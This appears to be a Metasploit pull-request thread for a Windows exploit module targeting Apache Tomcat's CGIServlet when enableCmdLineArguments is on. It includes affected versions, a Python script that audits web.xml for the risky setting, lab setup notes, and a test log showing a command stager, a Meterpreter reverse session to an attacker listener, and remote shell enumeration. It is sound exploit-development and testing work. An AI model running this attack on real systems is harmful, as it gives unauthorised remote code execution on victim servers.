Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability #11990
I wouldn't mind taking this one. If you had someone else in mind or it was a priority, feel free to replace me.

Not a priority. Please take your time. Thanks!
* 8.5.0 to 8.5.39
* 7.0.0 to 7.0.93

Also, the machine needs to enable the `enableCmdLineArguments` option in `web.xml`. For example:
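The `web.xml` fragment the docs point at is not reproduced on this page. As an added example (not the module's documentation and not Apache Tomcat's code), the constructed fragments below show a `CGIServlet` declaration with `enableCmdLineArguments` set to `true` beside the hardened one set to `false`, plus a small audit that reads a `web.xml` and reports every `CGIServlet` declaration, the URL patterns it is mapped to, and whether command-line arguments are explicitly enabled. The servlet name `cgi`, the `WEB-INF/cgi` path prefix and the `/cgi/*` mapping are the usual Tomcat CGI how-to values and match the directory shown in the test output further down; leaving the `executable` parameter empty so the `.bat` script runs directly is an assumption about how such a script would be configured.

```python
# Added example, not code from the Metasploit module or from Apache Tomcat.
# Audits a Tomcat web.xml for CGIServlet declarations that explicitly enable
# command-line arguments. Both web.xml fragments are constructed for this
# example; the empty "executable" parameter (run the script directly) is an
# assumption about how a .bat CGI script would be configured.
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed: a CGIServlet declaration in the state the exploit needs.
VULNERABLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Constructed: the same declaration with the query string no longer turned
# into command-line arguments for the script ("true" occurs only once above).
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-value>true</param-value>", "<param-value>false</param-value>")


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on namespaced tags."""
    return tag.rsplit("}", 1)[-1]


def _children_text(element):
    """Map each child's local tag name to its stripped text ('' if empty)."""
    return {_local(c.tag): (c.text or "").strip() for c in element}


def find_cgi_servlets(web_xml_text):
    """Return one finding per CGIServlet declared in web_xml_text.

    A finding carries the servlet name, its init-params, the url-patterns
    mapped to it and whether enableCmdLineArguments is explicitly 'true'.
    A missing parameter is reported as not explicitly enabled; its default
    depends on the Tomcat version, so check the CGI how-to for yours.
    """
    root = ET.fromstring(web_xml_text)

    # servlet-name -> [url-pattern, ...]
    mappings = {}
    for element in root.iter():
        if _local(element.tag) == "servlet-mapping":
            kv = _children_text(element)
            mappings.setdefault(kv.get("servlet-name"), []).append(kv.get("url-pattern"))

    findings = []
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        name, clazz, params = None, None, {}
        for child in servlet:
            tag = _local(child.tag)
            if tag == "servlet-name":
                name = (child.text or "").strip()
            elif tag == "servlet-class":
                clazz = (child.text or "").strip()
            elif tag == "init-param":  # several per servlet, so handled one by one
                kv = _children_text(child)
                params[kv.get("param-name", "")] = kv.get("param-value", "")
        if clazz != CGI_SERVLET_CLASS:
            continue
        enabled = params.get("enableCmdLineArguments", "").lower() == "true"
        findings.append({
            "servlet_name": name,
            "init_params": params,
            "url_patterns": mappings.get(name, []),
            "cmd_line_args_enabled": enabled,
        })
    return findings


def report(web_xml_text):
    """One human-readable line per CGIServlet found."""
    lines = []
    for f in find_cgi_servlets(web_xml_text):
        state = ("enableCmdLineArguments=true" if f["cmd_line_args_enabled"]
                 else "command-line arguments not explicitly enabled")
        where = ", ".join(f["url_patterns"]) or "(unmapped)"
        lines.append(f"{f['servlet_name']} on {where}: {state}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(VULNERABLE_WEB_XML)))
    print("\n".join(report(HARDENED_WEB_XML)))
```

Run it against the real `conf/web.xml` (or a webapp's `WEB-INF/web.xml`) by passing the file contents to `report`; any line ending in `enableCmdLineArguments=true` on a Windows host in the affected version ranges is the configuration this module targets.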
`conf\web.xml`
(I like to wrap file names and paths in ticks.)
Your bundle also includes that change. I attempted the exploit against my own custom install and it's failing (most likely a typo or user error on my behalf), but that instruction wasn't in the docs, but is required, right?

Yes, I have that set to true.

Your bundle worked, still trying to figure out why my manual didn't (so the docs can be adjusted if need be).

Worked on 8.5.20 as well on my Server 2012 box.
Exploit working, some minor doc cleanups.
documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
6. Run the module; you should get a session.

## Scenarios
### Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)

* Windows 10 Pro (x64)
* Apache Tomcat 9.0.17
* JDK 8
Remove this addition in favor of the h3 commented above.
### Check Method
Add an extra #.
```
[+] 172.16.135.141:8080 - The target is vulnerable.
```
### Code Execution
Add an extra #.
```
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
```
Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)
```
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
meterpreter > dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>
```
Ok. Awesome. I'll make the changes today. Thanks for testing!

There are a few minor doc things, but honestly it'll take me less time to change them when landing. Should be able to wrap this up over the weekend!

Release Notes

This PR adds an exploit for Apache Tomcat on Windows when the cmdlineargs option is configured (non-default).
Description
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.
Setup
Prepare a Windows box with JDK8 on it. You also want to make sure the box has the JAVA_HOME environment variable configured. For example:
To help you speed up the process, I have uploaded the actual vulnerable tomcat setup that you can use:
apache-tomcat-9.0.17.zip
To use it, simply download and extract it on the Windows machine. Go to the bin directory and execute the startup.bat file.
Note that I also created a debugging port for this tomcat on 4000, so if you want, you can attach IntelliJ and observe the tomcat internals more for analysis reasons.
The cgi script should be located at: http://IP:8080/cgi/test.bat
Verification
Demo: